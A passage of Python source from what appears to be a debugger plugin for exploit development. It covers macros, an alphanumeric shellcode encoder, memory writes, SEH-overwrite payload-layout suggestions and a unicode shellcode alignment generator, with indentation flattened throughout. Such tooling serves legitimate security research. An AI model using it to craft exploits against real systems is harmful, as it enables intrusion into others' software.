macro = macros[macroname]
macronametxt = "Running macro : %s" % macroname
macroline = "-" * len(macronametxt)
dbg.log(macronametxt)
dbg.log(macroline)
thismacro = macro
macrolist = []
for macroid in thismacro:
macrolist.append(macroid)
macrolist.sort()
for macroid in macrolist:
macrocmd = thismacro[macroid]
if macrocmd.startswith("#"):
dbg.log("Executing script %s" % macrocmd[1:])
output = dbg.nativeCommand("$<%s" % macrocmd[1:])
dbg.logLines(output)
dbg.log("-" * 40)
else:
dbg.log("Index %d : %s" % (macroid,macrocmd))
dbg.log("")
output = dbg.nativeCommand(macrocmd)
dbg.logLines(output)
dbg.log("-" * 40)
dbg.log("")
dbg.log("[+] Done.")
else:
dbg.log("** Please specify the macroname to run !",highlight=1)
return
if selectedcommand == "set":
if macroname != "":
if not macroname in macros:
dbg.log("** Macro %s does not exist !" % macroname)
return
if argcommand == "" and filename == "":
dbg.log("** Please enter a valid command with parameter -cmd",highlight=1)
return
thismacro = macros[macroname]
if index == -1:
for i in thismacro:
thiscmd = thismacro[i]
if thiscmd.startswith("#"):
dbg.log("** You cannot edit a macro that uses a scriptfile.",highlight=1)
dbg.log(" Edit file %s instead" % thiscmd[1:],highlight=1)
return
if filename == "":
# append to end of the list
# find the next index first
nextindex = 0
for macindex in thismacro:
if macindex >= nextindex:
nextindex = macindex+1
if thismacro.__class__.__name__ == "dict":
thismacro[nextindex] = argcommand
else:
thismacro = {}
thismacro[nextindex] = argcommand
else:
thismacro = {}
nextindex = 0
thismacro[0] = "#%s" % filename
macros[macroname] = thismacro
dbg.addKnowledge("macro",macros)
dbg.log("[+] Done, saved new command at index %d." % nextindex)
else:
# user has specified an index
if index in thismacro:
if argcommand == "#":
# remove command at this index
del thismacro[index]
else:
# if macro already contains a file entry, bail out
for i in thismacro:
thiscmd = thismacro[i]
if thiscmd.startswith("#"):
dbg.log("** You cannot edit a macro that uses a scriptfile.",highlight=1)
dbg.log(" Edit file %s instead" % thiscmd[1:],highlight=1)
return
# index exists - overwrite unless -insert was provided too
# remove or insert ?
#print sys.argv
if not insert:
thismacro[index] = argcommand
else:
# move things around
# get ordered list of existing indexes
indexes = []
for macindex in thismacro:
indexes.append(macindex)
indexes.sort()
thismacro2 = {}
cmdadded = False
for i in indexes:
if i < index:
thismacro2[i] = thismacro[i]
elif i == index:
thismacro2[i] = argcommand
thismacro2[i+1] = thismacro[i]
elif i > index:
thismacro2[i+1] = thismacro[i]
thismacro = thismacro2
else:
# index does not exist, add new command to this index
for i in thismacro:
thiscmd = thismacro[i]
if thiscmd.startswith("#"):
dbg.log("** You cannot edit a macro that uses a scriptfile.",highlight=1)
dbg.log(" Edit file %s instead" % thiscmd[1:],highlight=1)
return
if argcommand != "#":
thismacro[index] = argcommand
else:
dbg.log("** Index %d does not exist, unable to remove the command at that position" % index,highlight=1)
macros[macroname] = thismacro
dbg.addKnowledge("macro",macros)
if argcommand != "#":
dbg.log("[+] Done, saved new command at index %d." % index)
else:
dbg.log("[+] Done, removed command at index %d." % index)
else:
dbg.log("** Please specify the macroname to edit !",highlight=1)
return
if selectedcommand == "add":
if macroname != "":
if macroname in macros:
dbg.log("** Macro '%s' already exists !" % macroname,highlight=1)
return
else:
macros[macroname] = {}
dbg.log("[+] Adding macro '%s'" % macroname)
dbg.addKnowledge("macro",macros)
dbg.log("[+] Done.")
else:
dbg.log("** Please specify the macroname to add !",highlight=1)
return
if selectedcommand == "del":
if not macroname in macros:
dbg.log("** Macro '%s' doesn't exist !" % macroname,highlight=1)
else:
if not iamsure:
dbg.log("** To delete macro '%s', please add the -iamsure flag to the command" % macroname)
return
else:
dbg.forgetKnowledge("macro",macroname)
dbg.log("[+] Done, deleted macro '%s'" % macroname)
return
def procEnc(args):
validencoders = ['alphanum']
encodertyperror = True
byteerror = True
encodertype = ""
bytestoencodestr = ""
bytestoencode = ""
badbytes = ""
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
encodertype = args["t"]
encodertyperror = False
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
bytestoencodestr = args["s"]
byteerror = False
if "f" in args:
if type(args["f"]).__name__.lower() != "bool":
binfile = args["f"]
if os.path.exists(binfile):
if not silent:
dbg.log("[+] Reading bytes from %s" % binfile)
try:
f = open(binfile,"rb")
content = f.readlines()
f.close()
for c in content:
for a in c:
bytestoencodestr += "\\x%02x" % ord(a)
byteerror = False
except:
dbg.log("*** Error - unable to read bytes from %s" % binfile)
dbg.logLines(traceback.format_exc(),highlight=True)
byteerror = True
else:
byteerror = True
else:
byteerror = True
if "cpb" in args:
if type(args["cpb"]).__name__.lower() != "bool":
badbytes = hex2bin(args["cpb"])
if not encodertype in validencoders:
encodertyperror = True
if bytestoencodestr == "":
byteerror = True
else:
bytestoencode = hex2bin(bytestoencodestr)
if encodertyperror:
dbg.log("*** Please specific a valid encodertype with parameter -t.",highlight=True)
dbg.log("*** Valid types are: %s" % validencoders,highlight=True)
if byteerror:
dbg.log("*** Please specify a valid series of bytes with parameter -s",highlight=True)
dbg.log("*** or specify a valid path with parameter -f",highlight=True)
if encodertyperror or byteerror:
return
else:
cEncoder = MnEncoder(bytestoencode)
encodedbytes = ""
if encodertype == "alphanum":
encodedbytes = cEncoder.encodeAlphaNum(badchars = badbytes)
# determine correct sequence of dictionary
if len(encodedbytes) > 0:
logfile = MnLog("encoded_%s.txt" % encodertype)
thislog = logfile.reset()
if not silent:
dbg.log("")
dbg.log("Results:")
dbg.log("--------")
logfile.write("",thislog)
logfile.write("Results:",thislog)
logfile.write("--------",thislog)
encodedindex = []
fulllist_str = ""
fulllist_bin = ""
for i in encodedbytes:
encodedindex.append(i)
for i in encodedindex:
thisline = encodedbytes[i]
# 0 = bytes
# 1 = info
thislinebytes = "\\x" + "\\x".join(bin2hex(a) for a in thisline[0])
logline = " %s : %s : %s" % (thisline[0],thislinebytes,thisline[1])
if not silent:
dbg.log("%s" % logline)
logfile.write(logline,thislog)
fulllist_str += thislinebytes
fulllist_bin += thisline[0]
if not silent:
dbg.log("")
dbg.log("Full encoded string:")
dbg.log("--------------------")
dbg.log("%s" % fulllist_bin)
logfile.write("",thislog)
logfile.write("Full encoded string:",thislog)
logfile.write("--------------------",thislog)
logfile.write("%s" % fulllist_bin,thislog)
logfile.write("",thislog)
logfile.write("Full encoded hex:",thislog)
logfile.write("-----------------",thislog)
logfile.write("%s" % fulllist_str,thislog)
return
def procString(args):
mode = ""
useunicode = False
terminatestring = True
addy = 0
regs = dbg.getRegs()
stringtowrite = ""
# read or write ?
if not "r" in args and not "w" in args:
dbg.log("*** Error: you must indicate if you want to read (-r) or write (-w) ***",highlight=True)
return
addresserror = False
if not "a" in args:
addresserror = True
else:
if type(args["a"]).__name__.lower() != "bool":
# check if it's a register or not
if str(args["a"]).upper() in regs:
addy = regs[str(args["a"].upper())]
else:
addy = int(args["a"],16)
else:
addresserror = True
if addresserror:
dbg.log("*** Error: you must specify a valid address with -a ***",highlight=True)
return
if "w" in args:
mode = "write"
if "r" in args:
# read wins, because it's non destructive
mode = "read"
if "u" in args:
useunicode = True
stringerror = False
if "w" in args and not "s" in args:
stringerror = True
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
stringtowrite = args["s"]
else:
stringerror = True
if "noterminate" in args:
terminatestring = False
if stringerror:
dbg.log("*** Error: you must specify a valid string with -s ***",highlight=True)
return
if mode == "read":
stringinmemory = ""
extra = " "
try:
if not useunicode:
stringinmemory = dbg.readString(addy)
else:
stringinmemory = dbg.readWString(addy)
extra = " (unicode) "
dbg.log("String%sat 0x%08x:" % (extra,addy))
dbg.log("%s" % stringinmemory)
except:
dbg.log("Unable to read string at 0x%08x" % addy)
if mode == "write":
origstring = stringtowrite
writtendata = ""
try:
if not useunicode:
if terminatestring:
stringtowrite += "\x00"
byteswritten = ""
for c in stringtowrite:
byteswritten += " %s" % bin2hex(c)
dbg.writeMemory(addy,stringtowrite)
writtendata = dbg.readString(addy)
dbg.log("Wrote string (%d bytes) to 0x%08x:" % (len(stringtowrite),addy))
dbg.log("%s" % byteswritten)
else:
newstring = ""
for c in stringtowrite:
newstring += "%s%s" % (c,"\x00")
if terminatestring:
newstring += "\x00\x00"
dbg.writeMemory(addy,newstring)
dbg.log("Wrote unicode string (%d bytes) to 0x%08x" % (len(newstring),addy))
writtendata = dbg.readWString(addy)
byteswritten = ""
for c in newstring:
byteswritten += " %s" % bin2hex(c)
dbg.log("%s" % byteswritten)
if not writtendata.startswith(origstring):
dbg.log("Write operation succeeded, but the string in memory doesn't appear to be there",highlight=True)
except:
dbg.log("Unable to write the string to 0x%08x" % addy)
dbg.logLines(traceback.format_exc(),highlight=True)
return
def procKb(args):
validcommands = ['set','list','del']
validcommandfound = False
selectedcommand = ""
selectedid = ""
selectedvalue = ""
for command in validcommands:
if command in args:
validcommandfound = True
selectedcommand = command
break
dbg.log("")
if not validcommandfound:
dbg.log("*** Please specify a valid command. Valid commands are :")
for command in validcommands:
dbg.log(" -%s" % command)
return
if "id" in args:
if type(args["id"]).__name__.lower() != "bool":
selectedid = args["id"]
if "value" in args:
if type(args["value"]).__name__.lower() != "bool":
selectedvalue = args["value"]
dbg.log("Knowledgebase database : %s" % dbg.getKBDB())
kb = dbg.listKnowledge()
if selectedcommand == "list":
dbg.log("Number of IDs in Knowledgebase : %d" % len(kb))
if len(kb) > 0:
if selectedid == "":
dbg.log("IDs :")
dbg.log("-----")
for kbid in kb:
dbg.log(kbid)
else:
if selectedid in kb:
kbid = dbg.getKnowledge(selectedid)
kbtype = kbid.__class__.__name__
kbtitle = "Entries for ID %s (type %s) :" % (selectedid,kbtype)
dbg.log(kbtitle)
dbg.log("-" * (len(kbtitle)+2))
if selectedvalue != "":
dbg.log(" (Filter : %s)" % selectedvalue)
nrentries = 0
if kbtype == "dict":
for dictkey in kbid:
if selectedvalue == "" or selectedvalue in dictkey:
logline = ""
if kbid[dictkey].__class__.__name__ == "int" or kb[dictkey].__class__.__name__ == "long":
logline = " %s : %d (0x%x)" % (str(dictkey),kbid[dictkey],kbid[dictkey])
else:
logline = " %s : %s" % (str(dictkey),kbid[dictkey])
dbg.log(logline)
nrentries += 1
if kbtype == "list":
cnt = 0
for entry in kbid:
dbg.log(" %d : %s" % (cnt,kbid[entry]))
cnt += 1
nrentries += 1
if kbtype == "str":
dbg.log(" %s" % kbid)
nrentries += 1
if kbtype == "int" or kbtype == "long":
dbg.log(" %d (0x%08x)" % (kbid,kbid))
nrentries += 1
dbg.log("")
filtertxt = ""
if selectedvalue != "":
filtertxt="filtered "
dbg.log("Number of %sentries for ID %s : %d" % (filtertxt,selectedid,nrentries))
else:
dbg.log("ID %s was not found in the Knowledgebase" % selectedid)
if selectedcommand == "set":
# we need an ID and a value argument
if selectedid == "":
dbg.log("*** Please enter a valid ID with -id",highlight=1)
return
if selectedvalue == "":
dbg.log("*** Please enter a valid value",highlight=1)
return
if selectedid in kb:
# vtableCache
if selectedid == "vtableCache":
# split on command
valueparts = selectedvalue.split(",")
if len(valueparts) == 2:
vtablename = valueparts[0].strip(" ")
vtablevalue = 0
if "0x" in valueparts[1].lower():
vtablevalue = int(valueparts[1],16)
else:
vtablevalue = int(valueparts[1])
kbadd = {}
kbadd[vtablename] = vtablevalue
dbg.addKnowledge(selectedid,kbadd)
else:
dbg.log("*** Please provide a valid value for -value")
dbg.log("*** KB %s contains a list, please use a comma")
dbg.log("*** to separate entries. First entry should be a string,")
dbg.log("*** Second entry should be an integer.")
return
else:
dbg.addKnowledge(selectedid,selectedvalue)
dbg.log(" ")
dbg.log("ID %s updated." % selectedid)
else:
dbg.log("ID %s was not found in the Knowledgebase" % selectedid)
if selectedcommand == "del":
if selectedid == "" or selectedid not in kb:
dbg.log("*** Please enter a valid ID with -id",highlight=1)
return
else:
dbg.forgetKnowledge(selectedid,selectedvalue)
if selectedvalue == "":
dbg.log("*** Entire ID %s removed from Knowledgebase" % selectedid)
else:
dbg.log("*** Object %s in ID %s removed from Knowledgebase" % (selectedvalue,selectedid))
return
def procBPSeh(self):
sehchain = dbg.getSehChain()
dbg.log("Nr of SEH records : %d" % len(sehchain))
if len(sehchain) > 0:
dbg.log("SEH Chain :")
dbg.log("-----------")
dbg.log("Address Next SEH Handler")
for sehrecord in sehchain:
address = sehrecord[0]
sehandler = sehrecord[1]
nseh = ""
try:
nsehvalue = struct.unpack('<L',dbg.readMemory(address,4))[0]
nseh = "0x%08x" % nsehvalue
except:
nseh = "0x????????"
bpsuccess = True
try:
if __DEBUGGERAPP__ == "WinDBG":
bpsuccess = dbg.setBreakpoint(sehandler)
else:
dbg.setBreakpoint(sehandler)
bpsuccess = True
except:
bpsuccess = False
bptext = ""
if not bpsuccess:
bptext = "BP failed"
else:
bptext = "BP set"
ptr = MnPointer(sehandler)
funcinfo = ptr.getPtrFunction()
dbg.log("0x%08x %s 0x%08x %s <- %s" % (address,nseh,sehandler,funcinfo,bptext))
dbg.log("")
return "Done"
def procSehChain(self):
sehchain = dbg.getSehChain()
dbg.log("Nr of SEH records : %d" % len(sehchain))
handlersoverwritten = {}
if len(sehchain) > 0:
dbg.log("Start of chain (TEB FS:[0]) : 0x%08x" % sehchain[0][0])
dbg.log("Address Next SEH Handler")
dbg.log("------- -------- -------")
for sehrecord in sehchain:
recaddress = sehrecord[0]
sehandler = sehrecord[1]
nseh = ""
try:
nsehvalue = struct.unpack('<L',dbg.readMemory(recaddress,4))[0]
nseh = "0x%08x" % nsehvalue
except:
nseh = 0
sehandler = 0
overwritedata = checkSEHOverwrite(recaddress,nseh,sehandler)
overwritemark = ""
funcinfo = ""
if sehandler > 0:
ptr = MnPointer(sehandler)
funcinfo = ptr.getPtrFunction()
else:
funcinfo = " (corrupted record)"
if str(nseh).startswith("0x"):
nseh = "0x%08x" % int(nseh,16)
else:
nseh = "0x%08x" % int(nseh)
if len(overwritedata) > 0:
handlersoverwritten[recaddress] = overwritedata
smashoffset = int(overwritedata[1])
typeinfo = ""
if overwritedata[0] == "unicode":
smashoffset += 2
typeinfo = " [unicode]"
overwritemark = " (record smashed at offset %d%s)" % (smashoffset,typeinfo)
dbg.log("0x%08x %s 0x%08x %s%s" % (recaddress,nseh,sehandler,funcinfo, overwritemark), recaddress)
if len(handlersoverwritten) > 0:
dbg.log("")
dbg.log("Payload structure suggestion(s):")
for overwrittenhandler in handlersoverwritten:
overwrittendata = handlersoverwritten[overwrittenhandler]
overwrittentype = overwrittendata[0]
overwrittenoffset = int(overwrittendata[1])
if not overwrittentype == "unicode":
dbg.log("[Junk * %d]['\\xeb\\x06\\x41\\x41'][p/p/r][shellcode][more junk if needed]" % (overwrittenoffset))
else:
overwrittenoffset += 2
dbg.log("[Junk * %d][nseh - walkover][unicode p/p/r][venetian alignment][shellcode][more junk if needed]" % overwrittenoffset)
return
def procDumpLog(args):
logfile = ""
levels = 0
nestedsize = 0x28
if "f" in args:
if type(args["f"]).__name__.lower() != "bool":
logfile = args["f"]
if "l" in args:
if type(args["l"]).__name__.lower() != "bool":
if str(args["l"]).lower().startswith("0x"):
try:
levels = int(args["l"],16)
except:
levels = 0
else:
try:
levels = int(args["l"])
except:
levels = 0
if "m" in args:
if type(args["m"]).__name__.lower() != "bool":
if str(args["m"]).lower().startswith("0x"):
try:
nestedsize = int(args["m"],16)
except:
nestedsize = 0x28
else:
try:
nestedsize = int(args["m"])
except:
nestedsize = 0x28
if logfile == "":
dbg.log(" *** Error: please specify a valid logfile with argument -f ***",highlight=1)
return
allocs = 0
frees = 0
# open logfile and record all objects & sizes
logdata = {}
try:
dbg.log("[+] Parsing logfile %s" % logfile)
f = open(logfile,"rb")
contents = f.readlines()
f.close()
for tline in contents:
line = str(tline)
if line.startswith("alloc("):
size = ""
addy = ""
lineparts = line.split("(")
if len(lineparts) > 1:
sizeparts = lineparts[1].split(")")
size = sizeparts[0].replace(" ","")
lineparts = line.split("=")
if len(lineparts) > 1:
linepartaddy = lineparts[1].split(" ")
for lpa in linepartaddy:
if addy != "":
break
if lpa != "":
addy = lpa
if size != "" and addy != "":
size = size.lower()
addy = addy.lower()
if not addy in logdata:
logdata[addy] = size
allocs += 1
if line.startswith("free("):
addy = ""
lineparts = line.split("(")
if len(lineparts) > 1:
addyparts = lineparts[1].split(")")
addy = addyparts[0].replace(" ","")
if addy != "":
addy = addy.lower()
if addy in logdata:
del logdata[addy]
frees += 1
dbg.log("[+] Logfile parsed, %d objects found" % len(logdata))
dbg.log(" Total allocs: %d, total free: %d" % (allocs,frees))
dbg.log("[+] Dumping objects")
logfile = MnLog("dump_alloc_free.txt")
thislog = logfile.reset()
for addy in logdata:
asize = logdata[addy]
ptrx = MnPointer(int(addy,16))
size = int(asize,16)
dumpdata = ptrx.dumpObjectAtLocation(size,levels,nestedsize,thislog,logfile)
except:
dbg.log(" *** Unable to open logfile %s ***" % logfile,highlight=1)
dbg.log(traceback.format_exc())
return
return
def procDumpObj(args):
addy = 0
levels = 0
size = 0
nestedsize = 0x28
regs = dbg.getRegs()
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
addy,addyok = getAddyArg(args["a"])
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
if str(args["s"]).lower().startswith("0x"):
try:
size = int(args["s"],16)
except:
size = 0
else:
try:
size = int(args["s"])
except:
size = 0
if "l" in args:
if type(args["l"]).__name__.lower() != "bool":
if str(args["l"]).lower().startswith("0x"):
try:
levels = int(args["l"],16)
except:
levels = 0
else:
try:
levels = int(args["l"])
except:
levels = 0
if "m" in args:
if type(args["m"]).__name__.lower() != "bool":
if str(args["m"]).lower().startswith("0x"):
try:
nestedsize = int(args["m"],16)
except:
nestedsize = 0
else:
try:
nestedsize = int(args["m"])
except:
nestedsize = 0
errorsfound = False
if addy == 0:
errorsfound = True
dbg.log("*** Please specify a valid address to argument -a ***",highlight=1)
else:
ptrx = MnPointer(addy)
osize = size
if size == 0:
# no size specified
if addy > 0:
dbg.log("[+] No size specified, checking if address is part of known heap chunk")
if ptrx.isInHeap():
heapinfo = ptrx.getHeapInfo()
heapaddy = heapinfo[0]
chunkobj = heapinfo[3]
if not heapaddy == None:
if heapaddy > 0:
chunkaddy = chunkobj.chunkptr
size = chunkobj.usersize
dbg.log(" Address found in chunk 0x%08x, heap 0x%08x, (user)size 0x%02x" % (chunkaddy, heapaddy, size))
addy = chunkobj.userptr
if size > 0xfff:
dbg.log(" I'll only dump 0xfff bytes from the object, for performance reasons")
size = 0xfff
if size > 0xfff and osize > 0:
errorsfound = True
dbg.log("*** Please keep the size below 0xfff (argument -s) ***",highlight=1)
if size == 0:
size = 0x28
if levels > 0 and nestedsize == 0:
errorsfound = True
dbg.log("*** Please specify a valid size to argument -m ***",highlight=1)
if not errorsfound:
ptrx = MnPointer(addy)
dumpdata = ptrx.dumpObjectAtLocation(size,levels,nestedsize)
return
# routine to copy bytes from one location to another
def procCopy(args):
src = 0
dst = 0
nrbytes = 0
regs = dbg.getRegs()
if "src" in args:
if type(args["src"]).__name__.lower() != "bool":
src,addyok = getAddyArg(args["src"])
if "dst" in args:
if type(args["dst"]).__name__.lower() != "bool":
dst,addyok = getAddyArg(args["dst"])
if "n" in args:
if type(args["n"]).__name__.lower() != "bool":
if "+" in str(args['n']) or "-" in str(args['n']):
nrbytes,bytesok = getAddyArg(args['n'])
if not bytesok:
errorsfound = True
else:
if str(args['n']).lower().startswith("0x"):
try:
nrbytes = int(args["n"],16)
except:
nrbytes = 0
else:
try:
nrbytes = int(args["n"])
except:
nrbytes = 0
errorsfound = False
if src == 0:
errorsfound = True
dbg.log("*** Please specify a valid source address to argument -src ***",highlight=1)
if dst == 0:
errorsfound = True
dbg.log("*** Please specify a valid destination address to argument -dst ***",highlight=1)
if nrbytes == 0:
errorsfound = True
dbg.log("*** Please specify a valid number of bytes to argument -n ***",highlight=1)
if not errorsfound:
dbg.log("[+] Attempting to copy 0x%08x bytes from 0x%08x to 0x%08x" % (nrbytes, src, dst))
sourcebytes = dbg.readMemory(src,nrbytes)
try:
dbg.writeMemory(dst,sourcebytes)
dbg.log(" Done.")
except:
dbg.log(" *** Copy failed, check if both locations are accessible/mapped",highlight=1)
return
# unicode alignment routines written by floyd (http://www.floyd.ch, twitter: @floyd_ch)
def procUnicodeAlign(args):
leaks = False
address = 0
alignresults = {}
bufferRegister = "eax" #we will put ebp into the buffer register
timeToRun = 15
registers = {"eax":0, "ebx":0, "ecx":0, "edx":0, "esp":0, "ebp":0,}
showerror = False
regs = dbg.getRegs()
if "l" in args:
leaks = True
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
address,addyok = getAddyArg(args["a"])
else:
address = regs["EIP"]
if leaks:
address += 1
if address == 0:
dbg.log("Please enter a valid address with argument -a",highlight=1)
dbg.log("This address must be the location where the alignment code will be placed/start")
dbg.log("(without leaking zero byte). Don't worry, the script will only use")
dbg.log("it to calculate the offset from the address to EBP.")
showerror=True
if "b" in args:
if args["b"].lower().strip() == "eax":
bufferRegister = 'eax'
elif args["b"].lower().strip() == "ebx":
bufferRegister = 'ebx'
elif args["b"].lower().strip() == "ecx":
bufferRegister = 'ecx'
elif args["b"].lower().strip() == "edx":
bufferRegister = 'edx'
else:
dbg.log("Please enter a valid register with argument -b")
dbg.log("Valid registers are: eax, ebx, ecx, edx")
showerror = True
if "t" in args and args["t"] != "":
try:
timeToRun = int(args["t"])
if timeToRun < 0:
timeToRun = timeToRun * (-1)
except:
dbg.log("Please enter a valid integer for -t",highlight=1)
showerror=True
if "ebp" in args and args["ebp"] != "":
try:
registers["ebp"] = int(args["ebp"],16)
except:
dbg.log("Please enter a valid value for ebp",highlight=1)
showerror=True
dbg.log("[+] Start address for venetian alignment routine: 0x%08x" % address)
dbg.log("[+] Will prepend alignment with null byte compensation? %s" % str(leaks).lower())
# ebp must be writeable for this routine to work
value_of_ebp = regs["EBP"]
dbg.log("[+] Checking if ebp (0x%08x) is writeable" % value_of_ebp)
ebpaccess = getPointerAccess(value_of_ebp)
if not "WRITE" in ebpaccess:
dbg.log("[!] Warning! ebp does not appear to be writeable!",highlight = 1)
dbg.log(" You will have to run some custom instructions first to make ebp writeable")
dbg.log(" and at that point, run this mona command again.")
dbg.log(" Hints: maybe you can pop something off the stack into ebp,")
dbg.log(" or push esp and pop it into ebp.")
showerror = True
else:
dbg.log(" OK (%s)" % ebpaccess)
if not showerror:
alignresults = prepareAlignment(leaks, address, bufferRegister, timeToRun, registers)
# write results to file
if len(alignresults) > 0:
if not silent:
dbg.log("[+] Alignment generator finished, %d results" % len(alignresults))
logfile = MnLog("venetian_alignment.txt")
thislog = logfile.reset()
for resultnr in alignresults:
resulttitle = "Alignment routine %d:" % resultnr
logfile.write(resulttitle,thislog)
logfile.write("-" * len(resulttitle),thislog)
theseresults = alignresults[resultnr]
for resultinstructions in theseresults:
logfile.write("Instructions:",thislog)
resultlines = resultinstructions.split(";")
for resultline in resultlines:
logfile.write(" %s" % resultline.strip(),thislog)
logfile.write("Hex:",thislog)
logfile.write("'%s'" % theseresults[resultinstructions],thislog)
logfile.write("",thislog)
return alignresults
def prepareAlignment(leaks, address, bufferRegister, timeToRun, registers):
def getRegister(registerName):
registerName = registerName.upper()
regs = dbg.getRegs()
if registerName in regs:
return regs[registerName]
def calculateNewXregister(x,h,l):
return ((x>>16)<<16)+(h<<8)+l
prefix = ""
postfix = ""
additionalLength = 0 #Length of the prefix+postfix instructions in after-unicode-conversion bytes
code_to_get_rid_of_zeros = "add [ebp],ch; " #\x6d --> \x00\x6d\x00
buf_sig = bufferRegister[1]
registers_to_fill = ["ah", "al", "bh", "bl", "ch", "cl", "dh", "dl"] #important: h's first!
registers_to_fill.remove(buf_sig+"h")
registers_to_fill.remove(buf_sig+"l")
leadingZero = leaks
for name in registers:
if not registers[name]:
registers[name] = getRegister(name)
#256 values with only 8276 instructions (bruteforced), best found so far:
#values_to_generate_all_255_values = [71, 87, 15, 251, 162, 185]
#but to be on the safe side, let's take only A-Za-z values (in 8669 instructions):
values_to_generate_all_255_values = [86, 85, 75, 109, 121, 99]
new_values = zip(registers_to_fill, values_to_generate_all_255_values)
if leadingZero:
prefix += code_to_get_rid_of_zeros
additionalLength += 2
leadingZero = False
#prefix += "mov bl,0; mov bh,0; mov cl,0; mov ch,0; mov dl,0; mov dh,0; "
#additionalLength += 12
for name, value in zip(registers_to_fill, values_to_generate_all_255_values):
padding = ""
if value < 16:
padding = "0"
if "h" in name:
prefix += "mov e%sx,0x4100%s%s00; " % (name[0], padding, hex(value)[2:])
prefix += "add [ebp],ch; "
additionalLength += 8
if "l" in name:
prefix += "mov e%sx,0x4100%s%s00; " % (buf_sig, padding, hex(value)[2:])
prefix += "add %s,%sh; " % (name, buf_sig)
prefix += "add [ebp],ch; "
additionalLength += 10
leadingZero = False
new_values_dict = dict(new_values)
for new in registers_to_fill[::2]:
n = new[0]
registers['e%sx'%n] = calculateNewXregister(registers['e%sx'%n], new_values_dict['%sh'%n], new_values_dict['%sl'%n])
if leadingZero:
prefix += code_to_get_rid_of_zeros
additionalLength += 2
leadingZero = False
#Let's push the value of ebp into the BufferRegister
prefix += "push ebp; %spop %s; " % (code_to_get_rid_of_zeros, bufferRegister)
leadingZero = True
additionalLength += 6
registers[bufferRegister] = registers["ebp"]
if not leadingZero:
#We need a leading zero for the ADD operations
prefix += "push ebp; " #something 1 byte, doesn't matter what
leadingZero = True
additionalLength += 2
#The last ADD command will leak another zero to the next instruction
#Therefore append (postfix) a last instruction to get rid of it
#so the shellcode is nicely aligned
postfix += code_to_get_rid_of_zeros
additionalLength += 2
alignresults = generateAlignment(address, bufferRegister, registers, timeToRun, prefix, postfix, additionalLength)
return alignresults
def generateAlignment(alignment_code_loc, bufferRegister, registers, timeToRun, prefix, postfix, additionalLength):
import copy, random, time
alignresults = {}
def sanitiseZeros(originals, names):
for index, i in enumerate(originals):
if i == 0:
warn("Your %s register is zero. That's bad for the heuristic." % names[index])
warn("In general this means there will be no result or they consist of more bytes.")
def checkDuplicates(originals, names):
duplicates = len(originals) - len(set(originals))
if duplicates > 0:
warn("""Some of the 2 byte registers seem to be the same. There is/are %i duplicate(s):""" % duplicates)
warn("In general this means there will be no result or they consist of more bytes.")
warn(", ".join(names))
warn(", ".join(hexlist(originals)))
def checkHigherByteBufferRegisterForOverflow(g1, name, g2):
overflowDanger = 0x100-g1
max_instructions = overflowDanger*256-g2
if overflowDanger <= 3:
warn("Your BufferRegister's %s register value starts pretty high (%s) and might overflow." % (name, hex(g1)))
warn("Therefore we only look for solutions with less than %i bytes (%s%s until overflow)." % (max_instructions, hex(g1), hex(g2)[2:]))
warn("This makes our search space smaller, meaning it's harder to find a solution.")
return max_instructions
def randomise(values, maxValues):
for index, i in enumerate(values):
if random.random() <= MAGIC_PROBABILITY_OF_ADDING_AN_ELEMENT_FROM_INPUTS:
values[index] += 1
values[index] = values[index] % maxValues[index]
def check(as1, index_for_higher_byte, ss, gs, xs, ys, M, best_result):
g1, g2 = gs
s1, s2 = ss
sum_of_instructions = 2*sum(xs) + 2*sum(ys) + M
if best_result > sum_of_instructions:
res0 = s1
res1 = s2
for index, _ in enumerate(as1):
res0 += as1[index]*xs[index] % 256
res0 = res0 - ((g2+sum_of_instructions)/256)
as2 = copy.copy(as1)
as2[index_for_higher_byte] = (g1 + ((g2+sum_of_instructions)/256)) % 256
for index, _ in enumerate(as2):
res1 += as2[index]*ys[index] % 256
res1 = res1 - sum_of_instructions
if g1 == res0 % 256 and g2 == res1 % 256:
return sum_of_instructions
return 0
def printNicely(names, buffer_registers_4_byte_names, xs, ys, additionalLength=0, prefix="", postfix=""):
thisresult = {}
resulting_string = prefix
sum_bytes = 0
for index, x in enumerate(xs):
for k in range(0, x):
resulting_string += "add "+buffer_registers_4_byte_names[0]+","+names[index]+"; "
sum_bytes += 2
for index, y in enumerate(ys):
for k in range(y):
resulting_string += "add "+buffer_registers_4_byte_names[1]+","+names[index]+"; "
sum_bytes += 2
resulting_string += postfix
sum_bytes += additionalLength
if not silent:
info("[+] %i resulting bytes (%i bytes injection) of Unicode code alignment. Instructions:"%(sum_bytes,sum_bytes/2))
info(" ", resulting_string)
hex_string = metasm(resulting_string)
if not silent:
info(" Unicode safe opcodes without zero bytes:")
info(" ", hex_string)
thisresult[resulting_string] = hex_string
return thisresult
def metasm(inputInstr):
#the immunity and metasm assembly differ a lot:
#immunity add [ebp],ch "\x00\xad\x00\x00\x00\x00"
#metasm add [ebp],ch "\x00\x6d\x00" --> we want this!
#Therefore implementing our own "metasm" mapping here
#same problem for things like mov eax,0x41004300
ass_operation = {'add [ebp],ch': '\\x00\x6d\\x00', 'pop ebp': ']', 'pop edx': 'Z', 'pop ecx': 'Y', 'push ecx': 'Q',
'pop ebx': '[', 'push ebx': 'S', 'pop eax': 'X', 'push eax': 'P', 'push esp': 'T', 'push ebp': 'U',
'push edx': 'R', 'pop esp': '\\', 'add dl,bh': '\\x00\\xfa', 'add dl,dh': '\\x00\\xf2',
'add dl,ah': '\\x00\\xe2', 'add ah,al': '\\x00\\xc4', 'add ah,ah': '\\x00\\xe4', 'add ch,bl': '\\x00\\xdd',
'add ah,cl': '\\x00\\xcc', 'add bl,ah': '\\x00\\xe3', 'add bh,dh': '\\x00\\xf7', 'add bl,cl': '\\x00\\xcb',
'add ah,ch': '\\x00\\xec', 'add bl,al': '\\x00\\xc3', 'add bh,dl': '\\x00\\xd7', 'add bl,ch': '\\x00\\xeb',
'add dl,cl': '\\x00\\xca', 'add dl,bl': '\\x00\\xda', 'add al,ah': '\\x00\\xe0', 'add bh,ch': '\\x00\\xef',
'add al,al': '\\x00\\xc0', 'add bh,cl': '\\x00\\xcf', 'add al,ch': '\\x00\\xe8', 'add dh,bl': '\\x00\\xde',
